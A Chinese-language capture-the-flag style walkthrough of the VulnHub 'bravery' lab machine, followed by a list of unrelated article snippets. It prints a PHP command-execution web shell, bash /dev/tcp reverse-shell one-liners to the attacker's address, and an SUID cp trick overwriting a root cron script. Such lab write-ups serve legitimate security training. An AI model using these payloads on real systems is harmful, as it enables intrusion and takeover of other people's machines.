vulnhub靶场之【digitalworld.local系列】的bravery靶机
前言
靶机:digitalworld.local-bravery,IP地址为192.168.10.8
攻击:kali,IP地址为192.168.10.6
kali采用VMware虚拟机,靶机采用virtualbox虚拟机,网卡都为桥接模式
这里官方给的有两种方式,一是直接使用virtualbox加载,另一种是通过VMware挂载磁盘,也给出了iso镜像文件
文章中涉及的靶机,来源于
vulnhub官网,想要下载,可自行访问官网下载,或者通过下方链接下载https://download.vulnhub.com/digitalworld/bravery-improved.7z或者通过网盘下载
https://pan.quark.cn/s/86cf8a398835
主机发现
使用arp-scan -l或netdiscover -r 192.168.10.1/24扫描
也可以使用nmap等工具进行
信息收集
使用nmap扫描端口
nmap -sV -O 192.168.10.8 -p- -T4
这是全面扫描,不过尽量更详细一点,先扫描tcp端口
nmap -sT 192.168.10.8 -p- -T4 -oA nmap_tcp
扫描udp的top20端口
nmap -sU 192.168.10.8 --top-ports 20 -T4
这里的udp和tcp端口处于open的无差,所以,采用tcp的端口,并进行端口选择
grep open nmap-tcp.nmap | awk -F'/' '{print $1}' | paste -sd ','
再对这些端口进行深一步的检测,比如检测服务等
ports=22,53,80,111,139,443,445,2049,3306,8080,20048,37191,49742
nmap -sV -O -sC -sT 192.168.10.8 -p $ports -oA detail
再通过nmap的脚本扫描有无漏洞
nmap --script=vuln -p $ports -oA vuln
根据以上收集的信息,有网站,有smb等,那么就一步一步来,大部分靶机都是从web开始,一步步推进
网站信息收集
80端口网站探测
访问80端口的网站,并未有内容,应该是测试网站
查看页面源代码后,也并未有信息,使用浏览器插件wappalyzer或者whatweb测试该网站,发现具有php语言,采用apache,与前面nmap扫描收集的信息一样
那么针对该80网站进行网站目录爆破,这里采用gobuster工具,也可以使用其他工具,很多
gobuster dir -u http://192.168.10.8 -w /usr/share/wordlists/dirb/big.txt -x php,bak,txt,js,html -b 403-404
这里的/0到/9都只是数字,访问README.txt,提示努力
访问/about,给出一个链接,并说这里有提示
访问uploads,这里虽然有文件夹,但是里面没有任何东西
再访问phpinfo.php,但是并不是真正的phpinfo界面,是空白
之前给出的链接中,直接访问是不存在的界面,那么进行拼接呢
http://192.168.10.8/1075692/Try-Harder
或
http://192.168.10.8/1075692
或
http://192.168.10.8/Try-Harder
访问后,有一张图片,大概就是说,“还需努力啊,少年!”
既然如此,好嘛,我就转换方向,我去8080网站看看,嘿嘿嘿
8080端口网站探测
访问8080端口默认界面
查看页面源代码,也并未发现隐藏信息
使用gobuster等工具进行目录爆破
gobuster dir -u http://192.168.10.8:8080 -w /usr/share/wordlists/dirb/big.txt -x php,bak,txt,js,html -b 403-404
先访问robots.txt,发现与前面爆破的路径,大部分都是一样的
访问/cgi-bin和404.html都是一样的界面显示,不过这里也是得知一些信息,为nignx管理,并且配置文件的路径也给出了
访问private,是以nginx默认的403界面显示
访问public,是一个常见的网站类型
再次对这个网站进行扫描
gobuster dir -u http://192.168.10.8:8080/public -w /usr/share/wordlists/dirb/big.txt -x php,bak,txt,js,html -b 403-404
发现mail.php,不过访问这个文件,是直接下载的,所以可能这个网站对于php文件并不能解析
访问qwertyuiop.html,发现是一张图片,图片中的英文就是提示
sometimes,what you seek is hiding in planin sight
下载图片,然后使用exiftool、binwalk、steghide等工具查看是否有隐写内容,测试发现并没有
到这里,对于网站探测已经over了,除非就是网站爆破时,字典的问题了
nfs探测
在之前,使用nmap扫描的时候,发现rpcbind和nfs,一般这两个都是搭配使用的
那么使用nmap的脚本再进行一次探测
nmap 192.168.10.8 --script=nfs*
有东西,那么进一步深入,使用showmount查看
showmount -e 192.168.10.8
可以看到,目标靶机确实是有,那么尝试直接挂载到kali进行测试是否可行
mkdir share
mount -t nfs 192.168.10.8:/var/nfsshare ./share
但是我查看了所有文件的内容,文件里面的内容,并没有任何有价值的
直到我再次查看,发现qwertyuioplkjhgfdsazxcvbnm这个文件有意思,结合前面password.txt以及其本身的内容来看,我怀疑这是一个密码
smb探测
前面也是有相关的smb服务的开启,所以,需要进一步进行探测的
使用nmap中的脚本探测
nmap 192.168.10.8 --script=smb*
枚举出三个分享IPC$、anonymous、secured
枚举出anonymous分享中,有内容
枚举出两个用户david、rick
再使用enum4linux枚举一下
enum4linux 192.168.10.8 -a
枚举出两个用户,与前面使用nmap一样
枚举出三个分享,也是和前面使用nmap出的结果一样
信息总结
当前获取到的信息有
nfs中的一个可能疑似密码的东西smb枚举出的三个分享以及两个用户- 网站中并未有明显信息,目前来看,需要从
smb着手
密码qwertyuioplkjhgfdsazxcvbnm
分享anonymous、secured
用户david、rick
漏洞寻找
根据前面的信息,尝试连接smb中的分享,可以使用smbclient或者smbmap都可以
smbclient //192.168.10.8/anonymous -N
#-N 是指不使用密码登录,也就是以匿名形式登录
因为readme.txt是英文,为了方便,翻译一下,表示这是一个临时的服务,这种情况在现实中确实有,不过这需要很长的潜伏
然后再次以登录身份进行测试anonymous,发现也是一样的东西
#密码 qwertyuioplkjhgfdsazxcvbnm
smbclient //192.168.10.8/anonymous -U david #成功登录
smbclient //192.168.10.8/anonymous -U rick #无法成功登录
那么换另一个分享secured,这里想匿名登录是失败的
#密码 qwertyuioplkjhgfdsazxcvbnm
smbclient //192.168.10.8/secured -U david #成功登录
smbclient //192.168.10.8/secured -U rick #无法成功登录
获取三个文件,下载到kali,然后查看内容
查看README.txt文件,这里明确提出了CMS,并且还搞出个单词goodtech
查看david.txt,提到域名,以及一个php的文件路径
查看genevieve.txt文件,这里的信息提到一个地址http://192.168.254.155/genevieve
根据上面收集的信息,构造一些网站的可能性,这里是不包括绑定域名的情况
http://192.168.10.8/devops/directortestpagev1.php
http://192.168.10.8:8080/devops/directortestpagev1.phphttp://192.168.10.8/genevieve
http://192.168.10.8:8080/genevieve
先尝试一下,发现访问成功一个,看网站的样子,应该是还在搭建中
把能点的都点了,发现基本上都是页面不存在,不过发现一个功能,点击后,跳转到登录界面
可以看到是CMS
以前面获取的信息,尝试进行登录,发现不行,包括刚获取的goodtech,把所有信息进行拼接,得出的用户名和密码,都无法登录,并且测试登录框,应该不存在注入
漏洞利用
那么使用searchsploit搜索,有无该CMS的漏洞cuppa
searchsploit cuppa
查看文档,发现用法,并且是文件包含,这个应该是cms构建时的代码原因
测试路径,并且确定是否可用,确实可以
那么就在kali本地创建一个php文件,使得其远程包含该文件,然后导致反弹shell
这里先写一个简单的php代码,可执行system的命令
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
把这个代码写入shell.php文件,然后再kali中,使用python开启一个http服务,观察是否可行
注意,一定不要把kali中的http服务关闭,因为远程代码执行需要调用的
可以看到,我们的代码确实通过远程执行了,所以这里就直接通过传参cmd反弹shell
bash -i >& /dev/tcp/192.168.10.6/9999 0>&1
#需要进行url编码
bash%20-i%20%3e%26%20%2fdev%2ftcp%2f192.168.10.6%2f9999%200%3e%261
提权
靶机内信息收集
查看网络连接
ss -antlp
查看ip地址,确定当前是否处在虚拟环境,确实未处于虚拟环境
ip add
查看以root的进程
ps aux | grep root
查看内核版本以及系统版本
uanme -a/-r
cat /etc/issue
cat /etc/*release
使用find寻找具有SUID权限的文件
find - perm -u=s -type f 2>/dev/null
查看定时任务
cat /etc/crontab
查看网站中的配置文件,发现连接数据库的用户名和密码,并且以root连接的
瞬间就让人想到udf提权,不过还是需要进一步验证
查看相关配置,可能确实可以udf提权
不过再尝试进行dumpfile时,这个是被拒绝了,还是不能udf提权
上传一些脚本检测吧,上传pspy64,执行后发现,有一个脚本每5分钟执行一次
定时任务提权
已知,有脚本定时以root身份执行,并且在前面寻找SUID权限文件时,有cp命令,那么就可以创建一个反弹shell的脚本,使用cp覆盖原本的定时任务,就可以获得一个root的反弹shell
#先在kali开启监听
nc -lvnp 1234#然后执行命令
cd /tmp #这里可以创建文件
echo "/bin/bash -i >& /dev/tcp/192.168.10.6/1234 0>&1" > 1.sh
cat 1.sh #确保反弹shell命令写入
/usr/bin/cp 1.sh /var/www/maintenance.sh #开始使用具有SUID权限的cp进行覆盖
ls -l /var/www #确保只有一个文件,也就是确保覆盖
cat /var/www/maintenance.sh #再次确认,内容是否修改
等待一会,即可发现,获取到root的shell,这个时间大概5分钟
总结
该靶机考察几点:
- 对于众多信息,要一步步去筛选,不要急躁。这里的网站信息刚开始可能确实没有,所以不要急躁
- 对于
nfs这个要稍微了解,建议去ai搜索一下,这个经常配合rpcbind出现,并且,靶机内一般都是与showmount和挂载有关 - 对于
smb服务,要会枚举,这里可以借助nmap的脚本,或者enum4linux或其他工具;枚举出之后,要会找到有用的信息,这里也就是密码的关键寻找 - 对于信息,要敏感,比如,如果是目录型网站,出现类似于目录的时候,要会拼接,这里因为出现的少,所以手工拼接即可,若是很多,要会自动化处理,也就是使用代码拼接目录,再通过工具批处理,选出可用的链接
- 对于提权,这里在获取到的平常信息,都无法提权时,可以借助工具观察,因为不可能每时每刻观察进程的命令,这也可能不显示
- 提权,要思路广,结合起来,这里就是想起
cp命令来覆盖root执行的定时任务脚本
相关文章:
vulnhub靶场之【digitalworld.local系列】的bravery靶机
前言 靶机:digitalworld.local-bravery,IP地址为192.168.10.8 攻击:kali,IP地址为192.168.10.6 kali采用VMware虚拟机,靶机采用virtualbox虚拟机,网卡都为桥接模式 这里官方给的有两种方式,…...
)
JMeter 实战项目脚本录制最佳实践(含 BadBoy 录制方式)
JMeter 实战项目脚本录制最佳实践(含 BadBoy 录制方式) 一、项目背景 在软件测试过程中,使用 JMeter 进行性能测试和功能测试是常见的操作。本实战项目将详细介绍如何使用 JMeter 自带工具以及 BadBoy 进行脚本录制,并完善脚本以…...
)
数据库基础五(数据库环境变量配置详细教程)
1、在小皮的设置界面检测3306端口,保障3306端口可用; 2、在小皮的首面界面,启动MySQL; 3、进行环境变量设置,找到MySQL的路径,进行复制; 4、在Windows的搜索栏内,输入“环境变量”&a…...
Matlab 大量接单
分享一个matlab接私活、兼职的平台 1、技术方向满足任一即可 2、技术要求 3、最后 技术方向满足即可 MATLAB:熟练掌握MATLAB编程语言,能够使用MATLAB进行数据处理、机器学习和深度学习等相关工作。 机器学习、深度学习、强化学习、仿真、复现、算法、…...
【算法】链表题型总结
链表题型可分为快慢指针和虚拟头节点两种解题技巧。 快慢指针 使用两个指针(快指针和慢指针),以不同的速度遍历链表,解决与链表位置、环检测相关的问题。 反转链表 快慢指针,慢指针一次走一步,快指针一次…...
【C++】对字符串的常用操作
C 中的字符串操作主要通过两种方式实现:使用 C 风格的字符串(字符数组)和使用 C 标准库中的 std::string 类型。大多数现代 C 程序使用 std::string 进行字符串处理,因为它提供了许多便捷的成员函数来处理字符串操作。以下是常见的…...
人工智能AI在汽车设计领域的应用探索
我是穿拖鞋的汉子,魔都中坚持长期主义的汽车电子工程师。 老规矩,分享一段喜欢的文字,避免自己成为高知识低文化的工程师: 简单,单纯,喜欢独处,独来独往,不易合同频过着接地气的生活…...
Linux mkdir 命令
Linux mkdir(英文全拼:make directory)命令用于创建目录。 语法 mkdir [-p] dirName 参数说明: -p 确保目录名称存在,不存在的就建一个。 实例 在工作目录下,建立一个名为 runoob 的子目录 : mkdir …...
gin框架学习笔记
初始gin package mainimport "github.com/gin-gonic/gin"type Response struct {Code int json:"code"Msg string json:"msg"Data any json:"data" }func index(c *gin.Context) {c.JSON(200, Response{Code: 0,Msg: "1…...
什么是预训练语言模型下游任务?
问题:Word2Vec模型是预训练模型吗? 由于训练的特性,word2Vec模型一定是与训练模型。给定一个词先使用独热编码然后使用预训练好的Q矩阵得到这个词的词向量。这里指的是词向量本身就是预训练的语言模型。 什么是下游任务? 在自然…...
cursor 弹出在签出前,请清理仓库工作树 窗口
问题出现的背景:是因为我有两台电脑开发,提交后,另一个电脑的代码是旧的,这个时候我想拉取最新的代码,就会出现如下弹窗,因为这个代码暂存区有记录或者工作区有代码的修改,所以有冲突࿰…...
Ubuntu2204下使用NVIDIA GeForce RTX 4090进行DeepSeek-R1-Distill-Llama-8B模型微调
Ubuntu2204下使用NVIDIA GeForce RTX 4090进行DeepSeek-R1-Distill-Llama-8B模型微调 环境准备创建Python微调环境准备数据集准备模型文件 模型微调模型预测原始模型预测微调模型预测 使用unsloth,可以方便地对大模型进行微调。以微调DeepSeek-R1-Distill-Llama-8B为…...
Ubuntu20.04安装Redis
目录 切换到root用户 使用 apt install redis 安装redis 修改配置文件 编辑 重新启动服务器 使用Redis客户端连接服务器 切换到root用户 如果没有切换到root用户的,切换到root用户。 使用 apt install redis 安装redis 遇到y/n直接y即可。 redis安装好之…...
)
【Word2Vec】Skip-gram 的直观理解(深入浅出)
01 什么是skip-gram 一句话来说就是,给定中心词,然后预测其周围的词: 02 模型结构 对于skip-gram来说,输入是一个[1 x V]维的ont-hot向量,其中V为词表大小,值为1的那一项就表示我们的中心词。经过一个[V x…...
MQ 笔记
什么是消息队列? 消息队列(Message Queue, MQ)是一种用于在分布式系统中传递消息的中间件技术。 它允许应用程序通过发送和接收消息进行异步通信。 消息队列的核心思想是解耦生产者和消费者,生产者将消息发送到队列中ÿ…...
leetcode第216题组合总和Ⅲ
原题出于leetcode第216题https://leetcode.cn/problems/combination-sum-iii/description/题目为: 找出所有相加之和为 n 的 k 个数的组合,且满足下列条件: 只使用数字1到9 每个数字 最多使用一次 返回 所有可能的有效组合的列表 。该列表…...
【零基础C语言】第四节 数组
【零基础C语言系列】 【零基础C语言】第一节 C语言概述【数制进制码制】-CSDN博客 【零基础C语言】第二节 数据类型、运算符、表达式-CSDN博客 【零基础C语言】第三节 控制结构-CSDN博客 一、一维数组...
20250225-代码笔记03-class CVRPModel AND other class
文章目录 前言一、class CVRPModel(nn.Module):__init__(self, **model_params)函数功能函数代码 二、class CVRPModel(nn.Module):pre_forward(self, reset_state)函数功能函数代码 三、class CVRPModel(nn.Module):forward(self, state)函数功能函数代码 四、def _get_encodi…...
京准电钟快讯:NTP时钟同步服务在智造行业应用
京准电钟快讯:NTP时钟同步服务在智造行业应用 京准电钟快讯:NTP时钟同步服务在智造行业应用 一、NTP技术概述 基本原理 NTP(Network Time Protocol)是一种用于同步计算机系统时间的网络协议,通过分层时钟源ÿ…...
【Qt】详细介绍如何在Visual Studio Code中编译、运行Qt项目
Visual Studio Code一只用的顺手,写Qt的时候也能用VS Code开发就方便多了。 理论上也不算困难,毕竟Qt项目其实就是CMake(QMake的情况这里就暂不考虑了)项目,VS Code在编译、运行CMake项目还是比较成熟的。 这里笔者打…...
jsherp importItemExcel接口存在SQL注入
一、漏洞简介 很多人说管伊佳ERP(原名:华夏ERP,英文名:jshERP)是目前人气领先的国产ERP系统虽然目前只有进销存财务生产的功能,但后面将会推出ERP的全部功能,有兴趣请帮点一下 二、漏洞影响 …...
Node.js, Bun, Deno 比较概述
以下是 Node.js、Bun 和 Deno 的对比分析 概览 对比维度Node.jsDenoBun首次发布200920202022创始人Ryan DahlRyan Dahl(Node.js 原作者)Jarred Sumner运行时引擎V8(Chrome)V8(Chrome)JavaScriptCore&#…...
大白话跨域问题怎么破,解决方法有啥?
大白话跨域问题怎么破,解决方法有啥? 啥是跨域问题 咱先说说啥是跨域。你可以把每个网站想象成一个独立的小房子,每个房子都有自己的地址(也就是域名)。正常情况下,一个房子里的东西只能在这个房子里用&a…...
DeepSeek R1满血+火山引擎详细教程
DeepSeek R1满血火山引擎详细教程 一、安装Cherry Studio。 Cherry Studio AI 是一款强大的多模型 AI 助手,支持 iOS、macOS 和 Windows 平台。可以快速切换多个先进的 LLM 模型,提升工作学习效率。下载地址 https://cherry-ai.com/ 认准官网,无强制注册。 这…...
Pytorch中的ebmedding到底怎么理解?
在 PyTorch 中,nn.Embedding 是一个用于处理离散符号映射到连续向量空间的模块。它通常用于自然语言处理(NLP)任务(如词嵌入)、处理分类特征,或任何需要将离散索引转换为密集向量的场景。 核心理解 功能&am…...
【JAVA面试题】什么是面向对象?谈谈你对面向对象的理解。
【JAVA面试题】什么是面向对象?谈谈你对面向对象的理解 在 Java 面试中,面向对象 是一个高频考点。它不仅是一种编程思想,更是现代软件开发的核心方法论。本文将从 面向对象的概念、与面向过程的对比、以及 面向对象的三大特性(封…...
【C】链式二叉树算法题1 -- 单值二叉树
leetcode链接https://leetcode.cn/problems/univalued-binary-tree/description/ 1 题目描述 如果二叉树每个节点都具有相同的值,那么该二叉树就是单值二叉树。只有给定的树是单值二叉树时,才返回 true;否则返回 false。 示例 1࿱…...
基于单片机的GPS定位系统设计
1 系统硬件 1.1单片机模块 单片机的种类和型号可以说是有成百上千种,很多大的公司和企业都生产开发自己的单片机芯片,并且广泛应用于各种产品。Intel、 philips、 摩托罗拉、凌阳、宏晶等等种类繁多。大体上可以分为51系列单片机和非51系列单片机。 其…...
[React]Render Props、自定义Hooks和Context API优化详解
关于React中的Render Props、自定义Hooks和Context API优化的详解。我需要根据我搜索到的资料来综合回答这三个部分。首先,我需要分别理解每个概念的定义、用途以及优化方法。 首先看Render Props。根据Render Props是一种通过传递函数作为prop来共享组件间逻辑的技…...
关于大型语言模型的结构修剪
本文介绍了一种名为 **LLM-Pruner** 的方法,用于对大型语言模型(LLMs)进行结构化剪枝,以减少模型大小和计算需求,同时保留其多任务解决和语言生成能力。LLM-Pruner 通过依赖检测和重要性估计实现高效剪枝,并…...
【语法】C++中string类中的两个问题及解答
贴主在学习string类时遇到过两个困扰我的问题,今天拿出来给大家分享一下我是如何解决的 一、扩容时capacity的增长问题 在string的capacity()接口中,调用的是这个string对象的容量(可以存多少个有效字符),而size()是调用的string对象现在有…...
 命令提示符格式修改(PS1))
Linux(centOS) 命令提示符格式修改(PS1)
1. 命令提示符的组成 命令提示符(PS1)通常由以下部分组成: 部分示例说明[ 和 ][...]提示符的开头和结尾,用于视觉分隔。用户名root 或 tianjiajie当前登录的用户。root 是超级用户,普通用户可能是其他名称。分隔用户…...
QwenVL 2.5-本地安装编译布署全教程
开篇 DeepSeek开源后我国又开源了一个震撼大模型,QwenVL2.5,这是一个多模态的模形,它可以认图、识图、更能作图,还能读懂video。 Qwen2.5-VL 的主要特点如下所示: 感知更丰富的世界:Qwen2.5-VL 不仅擅长识别常见物体,如花、鸟、鱼和昆虫,还能够分析图像中的文本、图表…...
Hutool - JWT:轻松玩转 JSON Web Token
各位开发者朋友们,在现代的前后端分离开发模式里,身份验证和授权可是至关重要的环节。JSON Web Token(JWT)作为一种轻量级的身份验证和授权机制,在很多项目中都得到了广泛应用。它可以在客户端和服务器之间安全地传输信…...
2024年第十五届蓝桥杯大赛软件赛省赛Python大学A组真题解析《更新中》
文章目录 试题A: 拼正方形(本题总分:5 分)解析答案试题B: 召唤数学精灵(本题总分:5 分)解析答案试题C: 数字诗意解析答案试题D:回文数组试题A: 拼正方形(本题总分:5 分) 【问题描述】 小蓝正在玩拼图游戏,他有7385137888721 个2 2 的方块和10470245 个1 1 的方块,他需…...
【2025年2月28日稳定版】小米路由器4C刷机Immortalwrt 23.05.4系统搭载mentohust 0.3.1插件全记录
小米路由器4C刷机Immortalwrt系统搭载mentohust插件全记录 首先将路由器按住后面的reset,用一个针插进去然后等待5s左右,松开,即可重置路由器。 然后要用物理网线物理连接路由器Lan口和电脑,并将路由器WAN口连接至网口。确保电脑…...
W3C标准和ES规范之一文通
W3C标准和ES规范之一文通 以下是关于W3C标准和ES规范的透彻解析,通过结构化对比和生活化类比帮助理解和记忆: 一、核心概念对比(总览) 维度W3C标准ES规范(ECMAScript)定位Web技术的建筑蓝图JavaScript的语…...
Linux:应用层协议
协议是一种 "约定". socket api的接口, 在读写数据时, 都是按 "字符串" 的方式来发送接收的. 如果我们要传输一些"结构化的数据" 怎么办呢? 无论我们采用什么方案, 只要保证, 一端发送时构造的数据, 在另一端能够正确的进行解析, 就是ok的. 这种…...
深度学习五大模型:CNN、Transformer、BERT、RNN、GAN详细解析
# 深度学习五虎将:当CNN遇见Transformer的奇幻漂流 ## 序章:AI江湖的兵器谱排行 2012年,多伦多大学的厨房里,Hinton的学生们用GPU煎了个"AlexNet"荷包蛋,从此开启了深度学习的热兵器时代。如今五大模型各显…...
微服务组件详解——sentinel
1.启动sentinel: 下载jar sentinel-dashboard-1.8.0.jar 使用以下命令直接运行 jar 包(JDK 版本必须≥ 1.8): java -Dserver.port9999 -jar D:\sentinel-dashboard-1.8.0.jar 控制台访问地址:http://localhost:9999…...
波导阵列天线 学习笔记11双极化全金属垂直公共馈电平板波导槽阵列天线
摘要: 本communicaition提出了一种双极化全金属垂直公共馈电平板波导槽阵列天线。最初提出了一种公共馈电的单层槽平板波导来实现双极化阵列。此设计消除了传统背腔公共馈电的复杂腔体边缘的必要性,提供了一种更简单的天线结构。在2x2子阵列种发展了宽十…...
swift 开发效率提升工具
安装github copliot for xcode github/CopilotForXcode brew install --cask github-copilot-for-xcode安装swiftformat for xcode brew install swiftformatXcode Swift File代码格式化-SwiftFormat...
3-5 WPS JS宏 工作表的移动与复制学习笔记
************************************************************************************************************** 点击进入 -我要自学网-国内领先的专业视频教程学习网站 *******************************************************************************************…...
)
Centos7部署k8s(单master节点安装)
单master节点部署k8s集群(Centos) 一、安装前准备 1、修改主机名 按照资源准备修改即可 # master01 hostnamectl set-hostname master01 ; bash # node1 hostnamectl set-hostname node1 ; bash # node2 hostnamectl set-hostname node2 ; bash2、修改hosts文件 以下命令所…...
Tomcat
1.Tomcat是什么? Tomcat 是一个开源的、轻量级的 Servlet 容器,也被称为 Web 服务器,由 Apache 软件基金会的 Jakarta 项目开发,在 Java Web 开发领域应用广泛。 1)Servlet 容器:Servlet 是 Java 语言编写…...
)
基于SpringBoot+Vue的电影订票及评论网站的设计与实现(源码+SQL脚本+LW+部署讲解等)
专注于大学生项目实战开发,讲解,毕业答疑辅导,欢迎高校老师/同行前辈交流合作✌。 技术范围:SpringBoot、Vue、SSM、HLMT、小程序、Jsp、PHP、Nodejs、Python、爬虫、数据可视化、安卓app、大数据、物联网、机器学习等设计与开发。 主要内容:…...
地基简识Spring MVC 组件
Spring MVC 是一个基于 MVC 设计模式的框架,其核心组件协同工作以处理 HTTP 请求并生成响应。以下是各组件的详细说明及其协作流程: 一、核心组件 DispatcherServlet(前端控制器) 作用:接收所有请求并协调其他…...
如何通过Python网络爬虫技术应对复杂的反爬机制?
要使用Python网络爬虫技术绕过复杂的反爬虫机制,可以采取以下几种策略: 设置User-Agent:通过设置不同的User-Agent,模拟正常用户的浏览器访问,避免被网站识别为爬虫。可以使用fake_useragent库来随机生成User-Agent。…...
深入浅出:Spring AI 集成 DeepSeek 构建智能应用
Spring AI 作为 Java 生态中备受瞩目的 AI 应用开发框架,凭借其简洁的 API 设计和强大的功能,为开发者提供了构建智能应用的强大工具。与此同时,DeepSeek 作为领先的 AI 模型服务提供商,在自然语言处理、计算机视觉等领域展现了卓…...
Node.js二:第一个Node.js应用
精心整理了最新的面试资料和简历模板,有需要的可以自行获取 点击前往百度网盘获取 点击前往夸克网盘获取 创建的时候我们需要用到VS code编写代码 我们先了解下 Node.js 应用是由哪几部分组成的: 1.引入 required 模块:我们可以使用 requi…...